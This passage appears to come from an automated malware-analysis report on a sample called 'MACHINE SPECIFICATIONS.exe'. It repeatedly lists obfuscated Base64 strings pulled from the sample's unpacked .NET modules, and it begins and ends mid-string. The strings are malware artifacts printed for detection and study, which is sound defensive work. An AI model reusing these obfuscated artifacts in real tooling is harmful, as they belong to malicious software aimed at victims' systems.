'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.7.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.2.MACHINE SPECIFICATIONS.exe.f80000.1.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'SWxjZGEldXNpfWN4eGRtfDB4YTN1Y3d+dHh4d3k9eHBSARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'Q25ubHYlYG5kfW95ZWNpL3NwfDN2cDZ2aGl2cnl5PmtPARAXBEdWVwh7bWkMRENOV1RBE1tbWk4Z', 'RXRhb21hY2ZmKWlkYGJ8L3Z4fmdxZ395fzl5enI9fHoAQFJTSExDQwhdRQseGQ5NQEESYXN3Fl5VWF1eTx1RUSw4Yw==', 'Q2ljbWpganQob2NneGh8Zn52MnB1ezZ1fTl7a2xxd3pEAVZMBBcSB0pZWgt+amwPWVxTVFFGFlhWVUMa', 'QnNrZGxxaGJ7eipqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'Q25sd3ZkdXMoaG5heX56YnV/ZjNhZn95fzlSSFA9fXBMTlADV1VHRE0JQ1gMTFhOWV1TUVhQFlFXSxoJCB1cTzBhEAQGZS8qKS4vOGwiICMpcA==', 'U2B2dnZkcm5nZypqaGd7fGR8d31gNWNkcXd9O1ROUj9DTk5MVgVVV0lKTwtFXg5ORlBbX1VXWlIYX1VJHA8KHyIxMmMWAgRnISQrLCk+biA+PSty', 'SFJOI2JsanNte2Nlay1nfDBwZHJ9eXd1dHw6fXNvPi0UAUBTVAV0YGoJQ0ZNSktcEF5cX00U', 'SHRnI2lqYm5uYG95LGR9L3Fnc3p4dHR7fTl8dG49LCsAQ1JTBHdhZQhAR0pLSF0PX19eShU=', 'U253cWdgJndhcW9nLGthfX1wZjN9ZjZ5d206aGltbnBSVUdHBEdfB1xBTwtKREJbVUMc', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl7dXg9LykAQ1JTBEJURlFaSUpASA5GXVBVVkcVUFhKGUpJU15bTDMoLCRlZR8oPWk5IyM4IitwNzshJyF2NDc3LD4uKX4rCARCCgkEAQJIHQVLCx8PFgMSEx8RVQMEERcdWzkbGBrj9fGuusL05vH66erg6KA=', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxweZi80YjAsKjMrLGksIj4+Om8zPjwlMScidywxP3s1MD84BUEWDEQCFAYRGgkKAAhOGgMYHBRUMBARHRoOCFFDOQ3h+PHg5enjqQ==', 'VGlnI2JsanNteypqb25rf2RiMnx6eW83IDl4a2w9eW1BWFFARUlDB0FES0xJXg5JX0MSQ0ZaVVJLSlNVWxw
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/y78voWXF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.5.unpack, E6ou21sp/mtEC31vu.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/p34sqIEC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/v9AX5C4E.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/uA1ItnCm.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/rKssIt3o.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/omA5CsZE.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/uHFmWqpG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg', 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/u0039u7HvIWG.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/D5Gq3JZC.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/AC5KZsZF.csBase64 encoded string: 'SW9hbHZ3Y2R8KVhMTi14bnxkdzNxe2Jyanx+Nzxwa2xUAUBGBBULFR0cCw==', 'VGlnI21oZ2BtKX1iYGEubXUxYXtmfHh8fX06eWU9bHpNTlRKSkIGV0FRT0dfDVlGRFkSQERQVV5eUF9fHF5RUy8zYiU2KitnIT1tOGwvIT00NCAgeg=='
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/u0033Cv8rtWX.csBase64 encoded string: 'SW9hbHZ3Y2R8KW5ub2RjbnwxYXZkdGR2bHZoNzxobXoARU1XBA0GCQgACkJCXlpKUVUSXFIVVVhVVFsbFB0SH2lg'
                        Source: 1.0.MACHINE SPECIFICATIONS.exe.f80000.3.unpack, E6ou21sp/vmpGX47v.csBase64 encoded string: 'SWxjZGElfGhnZCpmeX56L3J0MnFxYWFyfXc6Kiw9f3FEARcTFAAGBg==', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 'QW1uI1dwdndne35uaC1IYGJ8c2dnaTw5cml9IDYzdG9FRhkJCkdLVxMDBExFSxUFHkFcVA8fGENRXwEREklXWSY9CBMBAmZqaAMlIiI5bh84PiY8Myc3JzAwOXsZJS46EhURQyMXCRIYFUBFBh0JVFpfGAMREgo1NSlaVlwqFxHk7vXwpMfv8+Xo+vemo+zi4O3V2tK1u7fb9vfr6c777dbEguTWxNbPwcrZi+XD2srC0trS2tLTl/7WyNbdycKV7qarpbiViIDo5Oqbo7+6rrK9t/OasKKgt6ux+5uvv6+IiIGQmM/Il4aOlr+lq6jP3dGmkpOSk5PYsJeam5jeuWltZyNCanRqaX12ISJ5Z2krOzxnfXNwa1l1djtadHJ6UwEKCQoPD1sCBwA=', 